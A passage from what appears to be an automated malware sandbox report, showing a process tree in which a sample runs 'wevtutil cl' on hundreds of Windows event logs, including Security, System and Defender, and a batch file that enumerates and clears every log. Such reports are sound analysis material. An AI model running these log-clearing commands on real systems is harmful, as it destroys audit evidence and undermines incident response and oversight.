        WEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sidebar/Diagnostic"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Speech-UserExperience/Diagnostic"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Spell-Checking/Analytic"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SpellChecker/Analytic"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StickyNotes/Admin"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StickyNotes/Debug"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StickyNotes/Diagnostic"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StorDiag/Operational"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StorPort/Operational"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Subsys-Csr/Operational"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Subsys-SMSS/Operational"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Superfetch/Main"
        5⤵
        
        PID:1676
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Superfetch/StoreLog"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sysprep/Analytic"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SystemHealthAgent/Diagnostic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TCPIP/Diagnostic"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Debug"
        5⤵
        
        PID:1496
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Diagnostic"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Debug"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Diagnostic"
        5⤵
        
        PID:1668
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TZUtil/Operational"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Debug"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Diagnostic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Operational"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TaskbarCPL/Diagnostic"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
        5⤵
        
        PID:1676
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
        5⤵
        
        PID:908
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Debug"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RDPClient/Operational"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
        5⤵
        
        PID:2020
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
        5⤵
        
        PID:792
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
        5⤵
        
        PID:544
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ThemeCPL/Diagnostic"
        5⤵
        
        PID:1168
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ThemeUI/Diagnostic"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-TunnelDriver"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UAC-FileVirtualization/Operational"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UAC/Operational"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UIAnimation/Diagnostic"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Debug"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Diagnostic"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UIAutomationCore/Perf"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UIRibbon/Diagnostic"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-USB-USBHUB/Diagnostic"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-USB-USBPORT/Diagnostic"
        5⤵
        
        PID:604
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-User Control Panel Performance/Diagnostic"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-User Profile Service/Diagnostic"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-User Profile Service/Operational"
        5⤵
        
        PID:432
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-User-Loader/Analytic"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UserModePowerService/Diagnostic"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UserPnp/DeviceNotifications"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UserPnp/Performance"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UserPnp/SchedulerOperations"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-UxTheme/Diagnostic"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-VAN/Diagnostic"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-VDRVROOT/Operational"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-VHDMP/Operational"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-VWiFi/Diagnostic"
        5⤵
        
        PID:1476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-VolumeControl/Performance"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
        5⤵
        
        PID:1076
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WABSyncProvider/Analytic"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
        5⤵
        
        PID:1676
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WER-Diag/Operational"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WFP/Analytic"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WFP/Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WLAN-AutoConfig/Operational"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
        5⤵
        
        PID:1676
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
        5⤵
        
        PID:1036
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WMI-Activity/Trace"
        5⤵
        
        PID:1512
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WMPDMCCore/Diagnostic"
        5⤵
        
        PID:604
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WMPDMCUI/Diagnostic"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WMPNSS-Service/Diagnostic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WMPNSSUI/Diagnostic"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WPD-ClassInstaller/Analytic"
        5⤵
        
        PID:1676
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WPD-ClassInstaller/Operational"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WPD-MTPClassDriver/Operational"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WSC-SRV/Diagnostic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WUSA/Debug"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WebIO-NDF/Diagnostic"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WebIO/Diagnostic"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WebServices/Tracing"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Win32k/Concurrency"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Win32k/Power"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Win32k/Render"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Win32k/Tracing"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Win32k/UIPI"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WinHttp/Diagnostic"
        5⤵
        
        PID:688
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WinINet/Analytic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WinRM/Analytic"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WinRM/Debug"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WinRM/Operational"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Windeploy/Analytic"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Windows Defender/Operational"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Windows Defender/WHC"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WindowsBackup/ActionCenter"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WindowsColorSystem/Debug"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WindowsColorSystem/Operational"
        5⤵
        
        PID:688
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-WindowsUpdateClient/Operational"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Wininit/Diagnostic"
        5⤵
        
        PID:1168
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Winlogon/Diagnostic"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Winlogon/Operational"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Winsock-AFD/Operational"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Winsock-WS2HELP/Operational"
        5⤵
        
        PID:544
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Winsrv/Analytic"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
        5⤵
        
        PID:1676
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Wired-AutoConfig/Operational"
        5⤵
        
        PID:1036
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Wordpad/Admin"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Wordpad/Debug"
        5⤵
        
        PID:604
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Wordpad/Diagnostic"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-mobsync/Diagnostic"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ntshrui"
        5⤵
        
        PID:792
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-osk/Diagnostic"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-stobject/Diagnostic"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "OAlerts"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Security"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Setup"
        5⤵
        
        PID:208
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "System"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "TabletPC_InputPanel_Channel"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "WINDOWS_MP4SDECD_CHANNEL"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "WINDOWS_MSMPEG2VDEC_CHANNEL"
        5⤵
        
        PID:1168
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "WINDOWS_WMPHOTO_CHANNEL"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "WMPSetup"
        5⤵
        
        PID:544
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "WMPSyncEngine"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Windows PowerShell"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
        5⤵
        
        PID:1944
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "muxencode"
        5⤵
        
        PID:908
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3.bat"
      4⤵
      PID:2004
    - - C:\Windows\system32\mode.com
        
        mode con cols=74 lines=20
        5⤵
        
        PID:1976
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit
        5⤵
        
        PID:1544
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit
        6⤵
        
        PID:228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wevtutil.exe el
        5⤵
        
        PID:1488
      - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Analytic"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Application"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DebugChannel"
        5⤵
        
        PID:1520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DirectShowFilterGraph"
        5⤵
        
        PID:1212
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DirectShowPluginControl"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Els_Hyphenation/Analytic"
        5⤵
        
        PID:2020
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "EndpointMapper"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "ForwardedEvents"
        5⤵
        
        PID:700
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "HardwareEvents"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Internet Explorer"
        5⤵
        
        PID:1640
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Key Management Service"
        5⤵
        
        PID:700
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
        5⤵
        
        PID:1640
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Media Center"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationDeviceProxy"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPerformance"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPipeline"
        5⤵
        
        PID:1976
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPlatform"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IE/Diagnostic"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
        5⤵
        
        PID:700
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
        5⤵
        
        PID:1972
    - - C:\Windows\system32\wevtutil.exe
        
